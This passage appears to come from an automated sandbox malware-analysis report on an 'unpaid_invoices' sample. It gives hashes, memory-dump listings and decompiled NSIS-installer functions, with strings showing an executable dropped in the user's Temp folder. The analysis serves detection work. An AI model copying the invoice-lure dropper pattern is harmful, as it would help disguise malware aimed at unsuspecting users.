              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: {
              • API String ID: 590372296-366298937
              • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
              • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
              • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
              • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404ABB Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f60;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CB2(0x3fb, _t146);
					E004068F5(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CB2(0x3fb, _t146);
							if(E00406045(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040666E(0x79ff58, _t146);
							_t87 = E00406A3B(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040666E(0x79ff58, _t146);
								_t89 = E00405FE8(0x79ff58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F89(0x79ff58);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F58(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
									E00404F40(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff48);
									} else {
										E00404E77(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b44 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045EC(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
									E00404A14();
								}
								 *0x7a1f78 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f88;
							_v60 = E00404E11;
							_v56 = _t146;
							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F3D(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
										lstrcatW(_t146, 0x7a6a40);
									}
								}
								 *0x7a1f78 =  *0x7a1f78 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
						E00405F3D(_t146);
					}
					 *0x7a7a78 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045CA(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045CA(_t167);
					E004045FF(_t166);
					_t138 = E00406A3B(8);
					if(_t138 == 0) {
						L53:
						return E00404631(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































              0x00404abb
              0x00404ac1
              0x00404ac7
              0x00404ad4
              0x00404ae2
              0x00404ae5
              0x00404aed
              0x00404af3
              0x00404af3
              0x00404aff
              0x00404b02
              0x00404b70
              0x00404b77
              0x00404c4e
              0x00404c55
              0x00404c64
              0x00404c64
              0x00404c68
              0x00404c72
              0x00404c7f
              0x00404c81
              0x00404c81
              0x00404c8f
              0x00404c96
              0x00404c9d
              0x00404ca0
              0x00404cdc
              0x00404cde
              0x00404ce4
              0x00404ce9
              0x00404ced
              0x00404cef
              0x00404cef
              0x00404d0b
              0x00000000
              0x00404d0d
              0x00404d10
              0x00404d1e
              0x00404d24
              0x00404d25
              0x00404d28
              0x00404d2b
              0x00000000
              0x00404d2b
              0x00404ca2
              0x00404ca4
              0x00404ca8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404caa
              0x00404caa
              0x00404cb7
              0x00404cbc
              0x00000000
              0x00000000
              0x00404cc0
              0x00404cc2
              0x00404cc2
              0x00404ccb
              0x00404ccd
              0x00404cd2
              0x00404cd5
              0x00404cda
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404cda
              0x00404d37
              0x00404d41
              0x00404d44
              0x00404d47
              0x00404d4e
              0x00404d4e
              0x00404d50
              0x00404d50
              0x00404d55
              0x00404d57
              0x00404d5f
              0x00404d66
              0x00404d68
              0x00404d73
              0x00404d73
              0x00404d68
              0x00404d83
              0x00404d8d
              0x00404d95
              0x00404db0
              0x00404d97
              0x00404da0
              0x00404da0
              0x00404d95
              0x00404db5
              0x00404dba
              0x00404dbf
              0x00404dc8
              0x00404dc8
              0x00404dd1
              0x00404dd3
              0x00404dd3
              0x00404ddf
              0x00404de7
              0x00404df1
              0x00404df1
              0x00404df6
              0x00000000
              0x00404df6
              0x00404ca0
              0x00404c57
              0x00404c5e
              0x00000000
              0x00000000
              0x00000000
              0x00404c5e
              0x00404b7d
              0x00404b86
              0x00404ba0
              0x00404ba5
              0x00404baf
              0x00404bb6
              0x00404bc2
              0x00404bc5
              0x00404bc8
              0x00404bcf
              0x00404bd7
              0x00404bda
              0x00404bde
              0x00404be5
              0x00404bed
              0x00404c47
              0x00404bef
              0x00404bf0
              0x00404bf7
              0x00404c01
              0x00404c09
              0x00404c16
              0x00404c2a
              0x00404c2e
              0x00404c2e
              0x00404c2a
              0x00404c33
              0x00404c40
              0x00404c40
              0x00404bed
              0x00000000
              0x00404ba5
              0x00404b93
              0x00000000
              0x00000000
              0x00404b99
              0x00000000
              0x00404b04
              0x00404b11
              0x00404b1a
              0x00404b27
              0x00404b27
              0x00404b2e
              0x00404b34
              0x00404b3d
              0x00404b40
              0x00404b43
              0x00404b4b
              0x00404b4e
              0x00404b51
              0x00404b57
              0x00404b5e
              0x00404b65
              0x00404dfc
              0x00404e0e
              0x00404b6b
              0x00404b6e
              0x00000000
              0x00404b6e
              0x00404b65

              APIs
              • GetDlgItem.USER32 ref: 00404B0A
              • SetWindowTextW.USER32(00000000,?), ref: 00404B34
              • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
              • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,007A1F88,00000000,?,?), ref: 00404C22
              • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq), ref: 00404C2E
              • SetDlgItemTextW.USER32 ref: 00404C40
                • Part of subcall function 00405CB2: GetDlgItemTextW.USER32(?,?,00000400,00404C77), ref: 00405CC5
                • Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                • Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                • Part of subcall function 004068F5: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                • Part of subcall function 004068F5: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
              • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E
                • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
              • API String ID: 2624150263-536565431
              • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
              • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
              • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
              • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















              0x004021b3
              0x004021bd
              0x004021c7
              0x004021d1
              0x004021dc
              0x004021df
              0x004021f9
              0x004021fc
              0x00402202
              0x00402205
              0x0040220f
              0x00402213
              0x00402213
              0x00402218
              0x00402229
              0x00402231
              0x004022e8
              0x004022e8
              0x004022ef
              0x00402237
              0x00402237
              0x00402246
              0x0040224a
              0x0040224d
              0x00402253
              0x00402261
              0x00402264
              0x00402266
              0x00402271
              0x00402271
              0x00402276
              0x00402278
              0x0040227f
              0x0040227f
              0x00402282
              0x0040228b
              0x0040228e
              0x00402294
              0x00402296
              0x004022a0
              0x004022a0
              0x004022a3
              0x004022ac
              0x004022af
              0x004022b8
              0x004022be
              0x004022c0
              0x004022ce
              0x004022ce
              0x004022d1
              0x004022d7
              0x004022d7
              0x004022da
              0x004022e0
              0x004022e6
              0x004022fb
              0x00000000
              0x00000000
              0x00000000
              0x004022e6
              0x004022f1
              0x00402c2d
              0x00402c39

              APIs
              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CreateInstance
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 542301482-47812868
              • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
              • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
              • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
              • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
              Download Yara Rule
              C-Code - Quality: 39%
              			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040666E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




              0x00402923
              0x0040293e
              0x00402949
              0x0040294a
              0x00402a94
              0x00402925
              0x00402928
              0x0040292b
              0x0040292e
              0x0040292e
              0x00402c2d
              0x00402c39

              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
              • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
              • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
              • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8ac8;
				_v28 =  *0x7a8ab0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8ab9 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F85(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f6c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f80;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f6c = 0;
								 *0x7a1f80 = 0;
								 *0x7a8b00 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
